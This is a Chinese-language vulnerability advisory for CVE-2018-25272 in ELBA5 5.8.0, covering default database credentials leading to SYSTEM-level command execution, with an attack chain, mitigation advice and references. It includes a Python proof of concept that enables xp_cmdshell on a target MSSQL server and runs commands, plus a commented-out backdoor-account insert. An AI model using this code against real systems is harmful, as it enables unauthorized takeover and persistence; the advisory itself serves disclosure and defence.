CVE-2018-25272 ELBA5 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2018-25272

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ELBA5

漏洞概述

ELBA5 5.8.0存在严重的远程代码执行漏洞。攻击者无需认证即可利用默认数据库凭据连接系统，并解密DBA密码。随后，攻击者可通过xp_cmdshell存储过程以SYSTEM权限执行任意命令，或在BEDIENER表中添加后门账户，完全控制主机。

技术细节

该漏洞的根本原因在于ELBA5 5.8.0使用了硬编码的默认数据库连接凭据。攻击者可直接利用这些凭证建立与目标数据库的连接。连接成功后，攻击者能够读取加密的DBA密码，并利用系统内部的解密逻辑或已知算法还原出明文密码。获取数据库最高权限后，攻击者启用MSSQL的xp_cmdshell扩展存储过程，该组件允许将SQL指令映射为系统指令，从而以SYSTEM级权限执行任意代码。此外，攻击者还可通过操作BEDIENER表插入后门用户，实现持久化控制。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标网络，发现ELBA5 5.8.0应用服务。

STEP 2

2. 未授权访问

利用系统默认的数据库连接凭据，直接连接到后端数据库。

STEP 3

3. 权限提升

读取并解密数据库中的DBA密码，获取数据库最高管理权限。

STEP 4

4. 命令执行

启用xp_cmdshell存储过程，以SYSTEM权限在操作系统层面执行任意命令。

STEP 5

5. 持久化

向BEDIENER表中插入数据，创建后门账户以维持访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pymssql

# Configuration
host = 'TARGET_IP'
user = 'DEFAULT_CONNECTOR_USER' # e.g. 'elba_user'
password = 'DEFAULT_CONNECTOR_PASS'
db_name = 'ELBA_DB'

def exploit():
    try:
        # Step 1: Connect using default connector credentials
        print(f"[*] Connecting to {host}...")
        conn = pymssql.connect(host, user, password, db_name)
        cursor = conn.cursor()
        print("[+] Connection established!")

        # Step 2: Decrypt DBA password (Logic depends on specific implementation)
        # Assuming we retrieved and decrypted the DBA password
        dba_password = "decrypted_dba_password"
        print("[+] DBA password decrypted/obtained.")

        # Step 3: Reconnect as DBA or execute commands if current user has rights to enable xp_cmdshell
        # In this scenario, we assume the connector user has rights to escalate or we switch context
        
        # Enable xp_cmdshell
        enable_cmd = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
        cursor.execute(enable_cmd)
        conn.commit()
        print("[+] xp_cmdshell enabled.")

        # Step 4: Execute arbitrary command
        cmd_to_exec = 'whoami'
        sql_cmd = f"EXEC master..xp_cmdshell '{cmd_to_exec}'"
        print(f"[*] Executing command: {cmd_to_exec}")
        cursor.execute(sql_cmd)
        
        rows = cursor.fetchall()
        for row in rows:
            print(row[0])

        # Step 5: Add backdoor user to BEDIENER table
        # add_user_sql = "INSERT INTO BEDIENER (username, password, is_admin) VALUES ('hacker', 'password', 1)"
        # cursor.execute(add_user_sql)
        # conn.commit()
        # print("[+] Backdoor user added.")

        conn.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

ELBA5 5.8.0

防御指南

临时缓解措施

建议立即修改应用程序的默认数据库连接密码，并检查BEDIENER表中是否存在未知用户。同时，应在数据库服务器上禁用xp_cmdshell以防止SQL注入导致系统命令执行，并尽快联系供应商获取安全补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2018-25272
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2018-25272
3 Details https://www.cvedetails.com/cve/CVE-2018-25272/
4 VulDB https://vuldb.com/cve/CVE-2018-25272
5 Link https://www.elba.at
6 Link https://www.exploit-db.com/exploits/45905
7 Link https://www.vulncheck.com/advisories/elba5-remote-code-execution-via-database-access